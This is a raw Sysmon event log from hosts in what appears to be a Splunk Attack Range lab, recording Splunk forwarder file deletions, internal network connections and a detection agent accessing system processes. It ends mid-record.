23542300x800000000000000044366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:04.660{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2252C9439367CC56DB526D30C09F96,SHA256=54F43FC854E122B154F2571CE834FBA19CF260C269CE610694613C02309B2F78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017062Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:04.107{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017065Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:05.893{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C384FA32F3233874F8958EAF4A656B58,SHA256=C0B1AB5450AF8BAAA1084169A3356799529F413C6B22284652832D289C5B62C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:05.761{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D47E4C8CEB995300972045F251764114,SHA256=5A6F6D71140D5AE809E2A17B28FCDD47629FF4FFB537ADAA526E17750756DC68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000044368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:24:05.745{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d92b37-0xc1b8fcef) 354300x800000000000000044367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:02.539{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56383-false10.0.1.12-8000- 354300x800000000000000017064Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:03.970{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50120-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000044370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:06.746{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8744C134A3E1DDD9478C899F7267B59D,SHA256=B02EDB0D383994B19C8643509DC6A1502E41D39400D96C22BDE34FB966EFF482,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:07.846{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=180AC92D0148C0D66258ED82E4F7561B,SHA256=27DBD84340BCE5CD9917F7972A4642D79F45B6DE34F85466090826DDE8300FF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017067Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:04.983{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50121-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017066Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:07.090{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=741B20152D0CD75EB6438D25AE621570,SHA256=9CB890DC04D2C3197D8EF00EB7789F57805AA8402C21A40E440A623EC0AD71AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:08.915{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AE9B0F60BF9111025A73FD17BD80000,SHA256=A1E2049805C7585C1943F9111FB07DFC52DFEA36AE5D85AA34175F4A9D2F47E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017068Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:08.182{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D290BA5ECD49A48C672889D97440F07,SHA256=67AEE83AC5F3E815CC657350A9DE687574DB77F458E8AC01D201DA0C40C5A49F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017069Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:09.266{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBA88FE61098E588DF036A0D57EACB1D,SHA256=DB07536BDDC3801A30319D2CFB7B4BC04728409039F0D43B9F7C6291C216A57B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:07.574{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56384-false10.0.1.12-8000- 23542300x800000000000000017070Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:10.356{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7581ACF2D2C0F14C1B3C068FB2A7AC75,SHA256=82E0E3FC05A0D5C8548D5FE19E653701D45C5C5D9460731FDC81151D31A46DFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:10.014{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43F55E7C5D0305DA7C9D6F21BC778F5E,SHA256=1CA9C3509EB356804551F48EC1CF0C059807C0A7495D6040DC60A603B30F8233,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017072Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:10.078{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50122-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017071Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:11.438{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA9D111BA69113A737E2B3D52308E381,SHA256=CD6DD74CE384B14F6DE02B5D3CD5F8A3E7A6495FC0844E2F74F2CBF8C09BCFF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.970{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.969{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.963{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.962{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.958{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.947{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.943{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.938{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.935{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.934{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.932{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.908{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.904{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.899{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.887{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.881{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.875{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.867{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:11.843{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program 